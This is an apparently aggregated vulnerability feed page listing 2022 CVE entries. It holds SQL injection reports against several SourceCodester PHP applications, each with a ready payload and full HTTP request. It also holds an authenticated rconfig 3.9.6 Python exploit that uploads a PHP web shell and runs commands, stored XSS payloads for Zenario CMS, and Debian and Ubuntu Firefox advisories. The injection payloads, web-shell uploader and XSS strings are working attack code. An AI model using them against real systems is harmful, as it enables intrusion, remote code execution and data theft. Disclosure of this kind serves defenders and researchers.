Online Leave Management System v1.0 was discovered to contain a SQL injection vulnerability via the component /admin/?page=user/manage_user&id=.

Permalink

**Online Leave Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: SunQingYu

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /leave\_system/admin/?page=user/manage\_user&id=

Vulnerability location: /leave\_system/admin/?page=user/manage\_user&id=,id

dbname=leave\_db,length=8

\[+\] Payload: /leave\_system/admin/?page=user/manage\_user&id=12%27%20and%20length(database())%20=9--+ // Leak place ---> id

GET /leave\_system/admin/?page\=user/manage\_user&id\=12%27%20and%20length(database())%20\=9\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

length=8 

length=9

CVE-2022-43179: bug_report/SQLi-1.md at main · debug601/bug_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /clients/view_client.php.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Linwei

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/admin/clients/view\_client.php?id=

Vulnerability location: /odlms/admin/clients/view\_client.php?id=,id

dbname=odlms\_db,length=8

\[+\] Payload: /odlms/admin/clients/view\_client.php?id=-2%27%20union%20select%201,2,3,4,database(),6,7,8,9,10,11,12,13,14,15--+ // Leak place ---> id

GET /odlms/admin/clients/view\_client.php?id\=\-2%27%20union%20select%201,2,3,4,database(),6,7,8,9,10,11,12,13,14,15\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

CVE-2022-43163: bug_report/SQLi-1.md at main · Zer0vAv/bug_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /tests/view_test.php.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Zhangyushi

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/admin/tests/view\_test.php?id=

Vulnerability location: /odlms/admin/tests/view\_test.php?id=,id

dbname=odlms\_db,length=8

\[+\] Payload: /odlms/admin/tests/view\_test.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8--+ // Leak place ---> id

GET /odlms/admin/tests/view\_test.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

CVE-2022-43162: bug_report/SQLi-1.md at main · zys20201225/bug_report

Automotive Shop Management System v1.0 is vulnerable to SQL Injection via /asms/classes/Master.php?f=delete_transaction.

**Automotive Shop Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: acvxd

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /asms/classes/Master.php?f=delete\_transaction

Vulnerability location: /asms/classes/Master.php?f=delete\_transaction, id

dbname =asms\_db,length=7

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /asms/classes/Master.php?f\=delete\_transaction HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0bfse7548hblm5lblclp48r057; dou\_member\_id=1; dou\_member\_code=3a2d7d2301afce4cf127
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-44402: bug_report/SQLi-2.md at main · acvxd/bug_report

Automotive Shop Management System v1.0 is vulnerable to SQL Injection via /asms/admin/?page=user/manage_user&id=.

**Automotive Shop Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: acvxd

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /asms/admin/?page=user/manage\_user&id=

Vulnerability location: /asms/admin/?page=user/manage\_user&id=, id

dbname =asms\_db,length=7

\[+\] Payload: /asms/admin/?page=user/manage\_user&id=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /asms/admin/?page\=user/manage\_user&id\=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0bfse7548hblm5lblclp48r057; dou\_member\_id=1; dou\_member\_code=3a2d7d2301afce4cf127
Connection: close

CVE-2022-44403: bug_report/SQLi-1.md at main · acvxd/bug_report

An arbitrary file upload vulnerability in rconfig v3.9.6 allows attackers to execute arbitrary code via a crafted PHP file.

**rconfig 3.9.6 - Arbitrary File Upload**

**Platform:****PHP**

**Date:****2021-04-21**

  

    # Exploit Title: rconfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (2)
    # Exploit Author: Vishwaraj Bhattrai
    # Date: 18/04/2021
    # Vendor Homepage: https://www.rconfig.com/
    # Software Link: https://www.rconfig.com/
    # Vendor: rConfig
    # Version: <= v3.9.6
    # Tested against Server Host: Linux+XAMPP
    
    import requests
    import sys
    s = requests.Session()
    
    host=sys.argv[1] #Enter the hostname
    cmd=sys.argv[2]  #Enter the command
    
    def exec_cmd(cmd,host):
        print "[+]Executing command"
        path="https://%s/images/vendor/x.php?cmd=%s"%(host,cmd)
        response=requests.get(path)
        print response.text
        print "\n[+]You can access shell via below path"
        print path
    
    def file_upload(cmd,host):
        print "[+]Bypassing file upload"
        burp0_url = "https://"+host+":443/lib/crud/vendors.crud.php"
        burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------3835647072299295753759313500", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/vendors.php", "Upgrade-Insecure-Requests": "1"}
        burp0_cookies = {"_ga": "GA1.2.71516207.1614715346", "PHPSESSID": ""}
        burp0_data = "-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorName\"\r\n\r\nCisco2\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorLogo\"; filename=\"banana.php\"\r\nContent-Type: image/gif\r\n\r\n<?php $cmd=$_GET['x'];system($cmd);?>\n\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"add\"\r\n\r\nadd\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"editid\"\r\n\r\n\r\n-----------------------------3835647072299295753759313500--\r\n"
        requests.post(burp0_url, headers=burp0_headers, cookies=s.cookies,data=burp0_data)
        exec_cmd(cmd,host)
    
    
    def login(host,cmd):
        print "[+]Logging in"
        burp0_url = "https://"+host+":443/lib/crud/userprocess.php"
        burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"}
        
        burp0_data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin
        response=s.post(burp0_url, headers=burp0_headers, cookies=s.cookies, data=burp0_data)
        file_upload(cmd,host)
    
    login(host,cmd)

CVE-2022-44384: Offensive Security’s Exploit Database Archive

Debian Linux Security Advisory 5282-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, information disclosure, spoofing or bypass of the SameSite cookie policy.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5282-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 16, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2022-45403 CVE-2022-45404 CVE-2022-45405 CVE-2022-45406                 CVE-2022-45408 CVE-2022-45409 CVE-2022-45410 CVE-2022-45411                 CVE-2022-45412 CVE-2022-45416 CVE-2022-45418 CVE-2022-45420                 CVE-2022-45421Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, information disclosure, spoofing or bypass of the SameSite cookiepolicy.For the stable distribution (bullseye), these problems have been fixed inversion 102.5.0esr-1~deb11u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmN1MS0ACgkQEMKTtsN8TjbLmBAAvNyETXc0dcwyCQIi/l6KVCLVwzQ8na8zSbrZZGzhebA7WKqeryy8O4f/8qv/chi7chHIlSY9aHkw65fDklAIkKomXUi+E58yvuSa1/DyYBGpQMoWrzHE4hAqs+VuZ/FwY/QiNeOXo0q44PuT/cjBY9LEUciJSywEK/YI0fPDG+F1VbaCK0EOvw7Zxi+VxVCkN6UIF7g0Rr3eibTWKgZi/EHrMgtA4UYg5ml6INVo306azZlDtTfZHympU48OKweMBEWpk0/f6rHmpTuWPWsuzLlpECeBRj4OdJOjmnjprhKJxE4KhHCJkYfVOLBh0SPjIM8k6bgzgXhD3Lc62xE2mqfDHYkIhMtm60r9GZbJzlEht8qeYLtlibfpm+IGx/RJDeuQJTv5jzsXto/lY4zThl/++E/30ecH7ynqj1R3394BAd9rW2O2rWcrWyas8Wa5Qpt7R+/OULq0OEAflT9m4HY3unflxIvmyTSINjryyKFe5Ns4uWB3E5sDBcnV4hqY/NOkUBVaZEhqmL9bvMvtviwj0eDzJBqVgOUxcy+IiT6aCCC4Dnr/CH3Odv7KHHpexKIIT80/uPNZPv2d5nNZXW5JO4ycD7lrZktjCOmXBHkJ2UJiQ3EiGJF6POIOInrEikwV7DqY1ix4uKbvl42xrsa7rZUYHWylFOS9gnFcJOk=5Vwd-----END PGP SIGNATURE-----

Debian Security Advisory 5282-1

Zenario CMS 9.3.57186 is vulnerable to Cross Site Scripting (XSS) via News articles.

**Summary**  
hi team,  
I found small Stored XSS

**Info**

Zenario 9.3.57186 last version  
FireFox 105.0.3 (64-bit)  

**Steps**

Login to account http://xxx.xxx.x.x/admin.php?  

in tab Menu, choose **News articles**  
Click **New News articles** >> in tab **Meta Data** inject code into **Summary** and tab **Main content** >> save  
  
  

**payload:** <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" \`AllowScriptAccess="always">

CVE-2022-44070: Stored XSS in News articles · Issue #3 · hieuminhnv/Zenario-CMS-last-version

Zenario CMS 9.3.57186 is vulnerable to Cross Site Scripting (XSS) via svg,Users & Contacts.

**Summary**  
hi team,  
I found Stored XSS in upload file svg version 9.0.54156 reported the vulnerability with CVE-2021-41952, in version 9.3.57186 i have bypassed it  
visit : #1 to view my report

**Info**  
Zenario 9.3.57186 last version  
FireFox 105.0.3 (64-bit)  
Chrome 106.0.5249.119

_**I will recreate it again**_  
**Steps**

1.  Login home page >> Choose **Users & Contacts** and create any user
    
2.  Click **Image** >> Upload an image  
    
3.  payload i inject to svg  
    
4.  go to link file inject , paypload executed

CVE-2022-44073: XSS upload file SVG in Zenario 9.3.57186 · Issue #6 · hieuminhnv/Zenario-CMS-last-version

Ubuntu Security Notice 5726-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, spoof the contents of the addressbar, bypass security restrictions, cross-site tracing or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5726-1November 16, 2022firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, spoof the contents of theaddressbar, bypass security restrictions, cross-site tracing or executearbitrary code. (CVE-2022-45403, CVE-2022-45404, CVE-2022-45405,CVE-2022-45406, CVE-2022-45407, CVE-2022-45408, CVE-2022-45409, CVE-2022-45410,CVE-2022-45411, CVE-2022-45413, CVE-2022-40674, CVE-2022-45418, CVE-2022-45419,CVE-2022-45420, CVE-2022-45421)Armin Ebert discovered that Firefox did not properly manage while resolvingfile symlink. If a user were tricked into opening a specially crafted weblink,an attacker could potentially exploit these to cause a denial of service. (CVE-2022-45412)Jefferson Scher and Jayateertha Guruprasad discovered that Firefox did notproperly sanitize the HTML download file extension under certain circumstances.If a user were tricked into downloading and executing malicious content, aremote attacker could execute arbitrary code with the privileges of the userinvoking the programs. (CVE-2022-45415)Erik Kraft, Martin Schwarzl, and Andrew McCreight discovered that Firefoxincorrectly handled keyboard events. An attacker could possibly use thisissue to perform a timing side-channel attack and possibly figure out whichkeys are being pressed. (CVE-2022-45416)Kagami discovered that Firefox did not detect Private Browsing Mode correctly.An attacker could possibly use this issue to obtain sensitive information aboutPrivate Browsing Mode.(CVE-2022-45417)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  firefox                         107.0+build2-0ubuntu0.20.04.1Ubuntu 18.04 LTS:  firefox                         107.0+build2-0ubuntu0.18.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-5726-1  CVE-2022-40674, CVE-2022-45403, CVE-2022-45404, CVE-2022-45405,  CVE-2022-45406, CVE-2022-45407, CVE-2022-45408, CVE-2022-45409,  CVE-2022-45410, CVE-2022-45411, CVE-2022-45412, CVE-2022-45413,  CVE-2022-45415, CVE-2022-45416, CVE-2022-45417, CVE-2022-45418,  CVE-2022-45419, CVE-2022-45420, CVE-2022-45421Package Information:  https://launchpad.net/ubuntu/+source/firefox/107.0+build2-0ubuntu0.20.04.1  https://launchpad.net/ubuntu/+source/firefox/107.0+build2-0ubuntu0.18.04.1

Tag

#firefox